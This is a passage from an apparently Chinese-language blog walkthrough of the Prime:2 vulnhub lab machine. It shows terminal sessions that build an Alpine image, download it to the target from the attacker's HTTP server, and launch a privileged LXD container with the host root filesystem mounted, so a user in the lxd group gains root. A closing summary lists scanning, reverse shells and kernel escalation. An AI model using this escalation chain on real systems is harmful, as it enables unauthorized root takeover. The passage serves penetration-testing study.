Fetched 66.9 MB in 60s (1,110 kB/s)                                                                  
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
1283 packages can be upgraded. Run 'apt list --upgradable' to see them.
N: Repository 'Kali Linux' changed its 'non-free component' value from 'non-free' to 'non-free non-free-firmware'
N: More information about this can be found online at: https://www.kali.org/blog/non-free-firmware-transition/

3.3.5.2 git下载alpine
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/prime2]
└─# git clone  https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
Receiving objects: 100% (50/50), 3.11 MiB | 939.00 KiB/s, done.
Resolving deltas: 100% (15/15), done.

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/prime2]
└─# cd lxd-alpine-builder 

    
┌──(root㉿kali)-[/home/…/dev_run_app/vulhub/prime2/lxd-alpine-builder]
└─# ./build-alpine
Determining the latest release... v3.20
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.20/main/x86_64
Downloading alpine-keys-2.4-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading apk-tools-static-2.14.4-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
alpine-devel@lists.alpinelinux.org-6165ee59.rsa.pub: OK
Verified OK
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2926  100  2926    0     0    566      0  0:00:05  0:00:05 --:--:--   566
--2024-06-07 11:23:14--  http://alpine.mirror.wearetriple.com/MIRRORS.txt
Resolving alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)... 93.187.10.106, 2a00:1f00:dc06:10::106
Connecting to alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)|93.187.10.106|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2926 (2.9K) [text/plain]
Saving to: ‘/home/kali/dev_run_app/vulhub/prime2/lxd-alpine-builder/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’

/home/kali/dev_run_app/vu 100%[===================================>]   2.86K  --.-KB/s    in 0.001s  

2024-06-07 11:23:15 (5.56 MB/s) - ‘/home/kali/dev_run_app/vulhub/prime2/lxd-alpine-builder/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’ saved [2926/2926]

Selecting mirror http://mirror.leaseweb.com/alpine//v3.20/main
fetch http://mirror.leaseweb.com/alpine//v3.20/main/x86_64/APKINDEX.tar.gz
(1/24) Installing alpine-baselayout-data (3.6.5-r0)
(2/24) Installing musl (1.2.5-r0)
(3/24) Installing busybox (1.36.1-r28)
Executing busybox-1.36.1-r28.post-install
(4/24) Installing busybox-binsh (1.36.1-r28)
(5/24) Installing alpine-baselayout (3.6.5-r0)
Executing alpine-baselayout-3.6.5-r0.pre-install
Executing alpine-baselayout-3.6.5-r0.post-install
(6/24) Installing ifupdown-ng (0.12.1-r5)
(7/24) Installing libcap2 (2.70-r0)
(8/24) Installing openrc (0.54-r1)
Executing openrc-0.54-r1.post-install
(9/24) Installing mdev-conf (4.7-r0)
(10/24) Installing busybox-mdev-openrc (1.36.1-r28)
(11/24) Installing alpine-conf (3.18.0-r0)
(12/24) Installing alpine-keys (2.4-r1)
(13/24) Installing alpine-release (3.20.0-r0)
(14/24) Installing ca-certificates-bundle (20240226-r0)
(15/24) Installing libcrypto3 (3.3.0-r3)
(16/24) Installing libssl3 (3.3.0-r3)
(17/24) Installing ssl_client (1.36.1-r28)
(18/24) Installing zlib (1.3.1-r1)
(19/24) Installing apk-tools (2.14.4-r0)
(20/24) Installing busybox-openrc (1.36.1-r28)
(21/24) Installing busybox-suid (1.36.1-r28)
(22/24) Installing scanelf (1.3.7-r2)
(23/24) Installing musl-utils (1.2.5-r0)
(24/24) Installing alpine-base (3.20.0-r0)
Executing busybox-1.36.1-r28.trigger
OK: 10 MiB in 24 packages
                            

3.3.5.3 构建压缩包上传到靶机
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/prime2]
└─# ssh jarves@192.168.6.163 -i test
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-16-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Jun  8 04:36:09 AM UTC 2024

  System load: 0.42               Memory usage: 19%   Processes:       249
  Usage of /:  44.4% of 18.57GB   Swap usage:   0%    Users logged in: 0

  => There were exceptions while processing one or more plugins. See
     /var/log/landscape/sysinfo.log for more information.


9 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sun May  9 11:14:10 2021
jarves@hackerctflab:~$ id
uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)

jarves@hackerctflab:~$ wget http://192.168.6.66:8000/lxd-alpine-builder/alpine-v3.20-x86_64-20240608_0105.tar.gz
--2024-06-08 05:13:11--  http://192.168.6.66:8000/lxd-alpine-builder/alpine-v3.20-x86_64-20240608_0105.tar.gz
Connecting to 192.168.6.66:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3858303 (3.7M) [application/gzip]
Saving to: ‘alpine-v3.20-x86_64-20240608_0105.tar.gz’

alpine-v3.20-x86_64-20240608_0105.tar.gz     100%[============================================================================================>]   3.68M  19.7MB/s    in 0.2s    

2024-06-08 05:13:11 (19.7 MB/s) - ‘alpine-v3.20-x86_64-20240608_0105.tar.gz’ saved [3858303/3858303]

jarves@hackerctflab:~$ ls
alpine-v3.20-x86_64-20240608_0105.tar.gz  secrets  something  upload

上传成功。

3.3.5.4 初始化
jarves@hackerctflab:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (dir, lvm, powerflex, btrfs, ceph) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: 
Size in GiB of the new loop device (1GiB minimum) [default=5GiB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
Would you like the LXD server to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]: 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 

初始化成功。

3.3.5.5 导入镜像
jarves@hackerctflab:~$  lxc image import ./alpine-v3.20-x86_64-20240608_0105.tar.gz --alias myimage
To start your first container, try: lxc launch ubuntu:22.04
Or for a virtual machine: lxc launch ubuntu:22.04 --vm

Image imported with fingerprint: cb4ed8abc68505dca7cace8ea61cae8af02eb2dbad887cebdec95d39cf37e170

3.3.5.6 查看镜像
jarves@hackerctflab:~$ lxc image list
+---------+--------------+--------+-------------------------------+--------------+-----------+---------+-----------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          | ARCHITECTURE |   TYPE    |  SIZE   |         UPLOAD DATE         |
+---------+--------------+--------+-------------------------------+--------------+-----------+---------+-----------------------------+
| myimage | cb4ed8abc685 | no     | alpine v3.20 (20240608_01:05) | x86_64       | CONTAINER | 3.68MiB | Jun 8, 2024 at 5:17am (UTC) |
+---------+--------------+--------+-------------------------------+--------------+-----------+---------+-----------------------------+

3.3.5.7 进入容器
jarves@hackerctflab:~$ lxc init myimage ignite -c security.privileged=true
Creating ignite
jarves@hackerctflab:~$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
jarves@hackerctflab:~$ lxc start ignite
jarves@hackerctflab:~$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # whoami
root

获得root权限成功


渗透总结

在本次prime:2靶机渗透测试,该系统主要包含LFI和SMB漏洞,具体内容包括主机扫描(nmap\netdiscover\arp-scan)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch\gobuster)、wpscan扫描、netcat、反弹shell、容器相关内容、linux内核提权等内容:

  • 目标主机扫描
  • 目录扫描
  • wpscan扫描
  • netcat监听
  • 反弹shell
  • 容器相关内容(操作相对难一点)
  • linux内核提权

参考文章

  • 18
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

(时光煮雨)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值